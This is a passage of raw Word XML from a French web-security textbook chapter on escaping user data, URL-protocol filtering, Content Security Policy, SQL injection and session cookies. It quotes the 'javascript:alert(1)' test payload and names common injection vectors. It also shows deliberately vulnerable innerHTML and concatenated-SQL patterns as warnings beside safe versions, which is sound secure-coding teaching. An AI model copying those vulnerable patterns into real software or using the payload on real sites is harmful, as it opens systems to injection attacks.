                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Donnée exécutée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>JSON.stringify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> échappé</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NE CONSTRUISEZ JAMAIS DE HTML PAR CONCATÉNATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>element.innerHTML = "&lt;p&gt;" + donnee + "&lt;/p&gt;"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> est une faille dès que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>donnee</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> vient de l'utilisateur. Utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>createElement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou un moteur de gabarit qui échappe automatiquement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un filtre de protocole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Vérifier un protocole d'URL avant de l'utiliser</w:t>
        <w:br/>
        <w:t>function urlSûre(valeur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const url = new URL(valeur, location.origin);</w:t>
        <w:br/>
        <w:t>return ["http:", "https:", "mailto:"].includes(url.protocol) ? url.href : "#";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "#";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>lien.href = urlSûre(donnee);</w:t>
        <w:br/>
        <w:t>// javascript:alert(1) devient "#"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les attributs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>srcdoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont des vecteurs classiques. Une politique de sécurité du contenu les bloque même si une injection parvient à passer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>34.3 Politique de sécurité du contenu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La CSP est un en-tête HTTP qui liste les sources autorisées pour chaque type de ressource. C'est la seconde ligne de défense : même injecté, un script non autorisé ne s'exécute pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une CSP réaliste · http</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Content-Security-Policy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  default-src 'self';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  img-src 'self' data: https://images.exemple.fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  style-src 'self' 'unsafe-inline';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  script-src 'self' https://stats.exemple.fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  connect-src 'self' https://api.exemple.fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-src 'self';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  frame-ancestors 'none';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  base-uri 'self';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  form-action 'self'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une politique de test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 Signaler les violations sans bloquer, pendant la mise au point --&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta http-equiv="Content-Security-Policy"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      content="default-src 'self'; report-uri /csp-report"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.108 — Six directives essentielles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5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Directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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 d'un dépassement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script-src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scripts exécutables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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style-src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Feuilles et styles en ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Blocage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>img-src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image non chargée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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connect-src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="351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fetch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, WebSocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Requête bloquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>frame-ancestors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégration en iframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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form-action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Cible d'un formulaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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Envoi bloqué</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>34.4 Injection SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'injection SQL ne se produit pas dans le navigateur, mais un formulaire mal traité y conduit. Le principe est le même : une donnée devient du code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux écritures, deux comportements · sql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Vulnérable : concaténation</w:t>
        <w:br/>
        <w:t>SELECT * FROM utilisateurs WHERE email = '" + email + "';</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- Sûre : requête paramétrée</w:t>
        <w:br/>
        <w:t>SELECT * FROM utilisateurs WHERE email = $1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le front-end ne peut pas protéger une base de données. Il doit en revanche ne jamais transmettre de données structurées par un canal qui les interprète, et le serveur doit utiliser des requêtes préparées.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>LA VALIDATION N'EST PAS UNE PROTECTION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Valider une entrée côté client améliore l'expérience. Ce n'est jamais une barrière de sécurité : un attaquant envoie ce qu'il veut directement au serveur. Toute validation doit être répétée côté serveur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>34.5 Sessions et formulaires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.109 — Six protections de session</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5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Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Protège contre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Mise en œuvre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vol par script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>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En-tête </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Set-Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>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 xml:space="preserve">Cookie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Interception réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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HTTPS uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SameSite=Lax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requêtes croisées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
